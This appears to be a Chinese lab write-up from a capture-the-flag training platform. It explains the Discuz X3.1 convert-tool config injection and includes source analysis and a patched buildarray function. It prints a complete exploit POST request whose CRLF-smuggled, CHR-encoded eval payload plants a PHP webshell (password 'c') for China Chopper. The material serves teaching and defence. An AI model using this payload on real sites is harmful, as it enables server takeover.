Discuz x3.1 utility/convert/config.inc.php漏洞get shell

实验环境

i 春秋 — 竞赛训练 – 这不是DZ？
操作机： Windows XP
**实验工具：**BURP、中国菜刀
目标：获取www.test.ichunqiu网站的服务器权限。

信息搜集

这是一个纯内网环境，与外界没有联网。渗透目标单一，不需要做太多的信息搜集。

打开目标网站：

嗯，特别清楚的Discuz CMS。

简单分析一下CMS信息：Discuz！ x3.1，显然。

信息搜集是可以考察一下技术支持单位，检查 “Powered by”信息。获取CMS信息，去网上找找有没有他的开源代码或是漏洞信息。

信息搜集之 漏洞信息搜集

利用百度、Google等搜索引擎搜集漏洞信息。（由于实验环境没有网，这些资料要在本地环境搜集）
这里可能会用到 Google hacking，搜索引擎语法。
漏洞信息 在一些漏洞平台比如乌云、补天、seebug等都可能有，当然有些可能要收费才能观看。

随便找了几个，就找到了我们需要的。https://www.exehack.net/134.html
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611

漏洞利用：

参加：https://bbs.ichunqiu.com/thread-1909-1-1.html
我有点懒得写了，直接复制粘贴，待会直接写源码分析了

打开 www.test.ichunqiu/utility/convert

直接使用EXP吧

POST /utility/convert/index.php HTTP/1.1Host: www.test.ichunqiuUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Length: 199Content-Type: application/x-www-form-urlencodeda=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

其实其他都不重要，最后一句所传的数据才是重点！

上菜刀！拿shell！

地址：www.test.ichunqiu/utility/convert/data/config.inc.php 密码：c

源码分析

这漏洞出现在一个DZ X系列自带的转换工具里面！
漏洞路径：utility/convert/data/config.inc.php在开始设置里面可以设置数据的属性，而post的数据直接写到了config.inc.php这个文件里面，无任何过滤检测！

我从网上下载了Discuz x3.1的源码包，利用notepad++进行代码审计。

payload

首先我们看一下完整的payload:

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

漏洞原理

index.php 文件分析

首先，打开 utility/convert/index.php 的源码：

<?php// 包含了common.inc.php文件require './include/common.inc.php';// 关于getgpc函数 在global_func.php 中。参考：http://blog.csdn.net/xavierdarkness/article/details/78062852$action = getgpc('a');// 取$_POST['a'],直接赋值给$action ，此时$action = config;$action = empty($action) ? getgpc('action') : $action;     //此时 $action = config;$source = getgpc('source') ? getgpc('source') : getgpc('s');    // $source = d7.2_x2.0 HTTP/1.1;$step = getgpc('step');$start = getgpc('start');……省略部分源码……if($action == 'source') {    require DISCUZ_ROOT.'./include/do_source.inc.php';    // common.inc.php 如果config.inc.php文件不存在，就为true} elseif($action == 'config' || CONFIG_EMPTY) {      // $action = config; 包含./include/do_config.inc.php 文件    require DISCUZ_ROOT.'./include/do_config.inc.php';  } elseif($action == 'setting') {……省略 ……?>

do_config.inc.php 文件分析

<?php$configfile = DISCUZ_ROOT.'./data/config.inc.php';$configfile_default = DISCUZ_ROOT.'./data/config.default.php';// 创建config.inc.php@touch($configfile);// 检查写入权限if(!is_writable($configfile)) {    showmessage('config_write_error');}$config_default = loadconfig('config.default.php');      // 加载默认配置$error = array();// submitcheck()返回true，此函数定义在 include\global.func.php 文件中if(submitcheck()) {    $newconfig = getgpc('newconfig');//取$_POST[newconfig]数据/*此时newconfig[aaaeval(eval("$_POST[c];"););//];*/    if(is_array($newconfig)) {        $checkarray = $setting['config']['ucenter'] ? array('source', 'target', 'ucenter') : array('source', 'target');        foreach ($checkarray as $key) {            if(!empty($newconfig[$key]['dbhost'])) {                $check = mysql_connect_test($newconfig[$key], $key);                if($check < 0) {                    $error[$key] = lang('mysql_connect_error_'.abs($check));                }            } else {                $error[$key] = lang('mysql_config_error');            }        }        //保存$newconfig到$configfile文件中，即config.inc.php文件。传入的数据没有经过任何过滤。        save_config_file($configfile, $newconfig, $config_default);        if(empty($error)) {            $db_target = new db_mysql($newconfig['target']);            $db_target->connect();            delete_process('all');            showmessage('config_success', 'index.php?a=select&source='.$source);        }    }}?>

函数 save_config_file

所在文件：\utility\convert\include\global.func.php

function save_config_file($filename, $config, $default) {    $config = setdefault($config, $default);           // 将$config中的空白项用 $default 中对应项的值填充// 联系上下文，即将 './data/config.default.php'文件对应项 赋值给 $newconfig 这个数组中对应的空白项// 此时的$config = $newconfig+config.default.php对应项的补充    $date = gmdate("Y-m-d H:i:s", time() + 3600 * 8);    $year = date('Y');    $content = <<<EOT<?php\$_config = array();EOT;        // 看下一步getvars函数，此时的$config = $newconfig+config.default.php对应项的补充    $content .= getvars(array('_config' => $config));    $content .= "\r\n// ".str_pad('  THE END  ', 50, '-', STR_PAD_BOTH)." //\r\n\r\n?>";    file_put_contents($filename, $content);}function setdefault($var, $default) {    foreach ($default as $k => $v) {        if(!isset($var[$k])) {            $var[$k] = $default[$k];        } elseif(is_array($v)) {            $var[$k] = setdefault($var[$k], $default[$k]);        }    }    return $var;}

函数 getvars

所在文件：\utility\convert\include\global.func.php

// $data = array('_config' => $config) 其中 $config = $newconfig+config.default.php对应项的补充function getvars($data, $type = 'VAR') {    $evaluate = '';    foreach($data as $key => $val) {        if(!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $key)) {            continue;        }        if(is_array($val)) {            // 查看buildarray函数，$key 即为_config            $evaluate .= buildarray($val, 0, "\${$key}")."\r\n";        } else {            $val = addcslashes($val, '\'\\');            $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";        }    }    return $evaluate;}

buildarray函数

所在文件：\utility\convert\include\global.func.php

// 这里的$array=$config $level=0  $pre=$_configfunction buildarray($array, $level = 0, $pre = '$_config') {    static $ks;    if($level == 0) {        $ks = array();        $return = '';    }    foreach ($array as $key => $val) {        // 遍历$config 中的 $key => $val ,  键值对应项        if($level == 0) {            //str_pad — 使用另一个字符串填充字符串为指定长度            // 第一个参数是要输出的字符串，指定长度为50，用'-'填充，居中            $newline = str_pad('  CONFIG '.strtoupper($key).'  ', 50, '-', STR_PAD_BOTH);            /*            这里是产生漏洞关键            1. DISCUZ的本意是使用$config数组的key作为每一块配置区域的"注释标题"            2. 写入配置文件的$newline依赖于$key，而$key是攻击者可控的            3. 未对输入数据进行正确的边界处理，导致攻击者在输入数据中插入换行符，逃离注释的作用范围，从而使输入数据转化为可执行代码                1) 换行符                2) ?>            这类定界符都是可以达到同样的效果的            */            $return .= "\r\n// $newline //\r\n";        }        $ks[$level] = $ks[$level - 1]."['$key']";        if(is_array($val)) {            $ks[$level] = $ks[$level - 1]."['$key']";            $return .= buildarray($val, $level + 1, $pre);        } else {            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";        }    }    return $return;}

攻击造成的效果：

newconfig部分对照ASCII码转换一下就是如下所示：（%0a%0d对应Windows下的换行操作 \n\r）

newconfig[aaaeval(eval("$_POST[c];"););//]=aaaa

这里我们就是通过%0a%0d进行换行操作来绕过注释，并成功将我们的恶意代码写入文件，不被注释掉，从而导致我们可以通过菜刀直接连接。

防御方法

\discuz\utility\convert\include\global.func.php

function buildarray($array, $level = 0, $pre = '$_config') {  static $ks;  if($level == 0){     $ks = array();     $return = '';   }  foreach ($array as $key => $val){     //过滤掉$key中的非字母、数字及下划线字符    $key = preg_replace("/[^\w]/", "", $key);    if($level == 0) {      $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);      $return .= "\r\n// $newline //\r\n";    }    $ks[$level] = $ks[$level - 1]."['$key']";    if(is_array($val)){      $ks[$level] = $ks[$level - 1]."['$key']";      $return .= buildarray($val, $level + 1, $pre);    }else{      $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;      $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";    }  }  return $return;}

他山之石

同一个漏洞，别人写的文章：http://www.cnblogs.com/LittleHann/p/4317665.html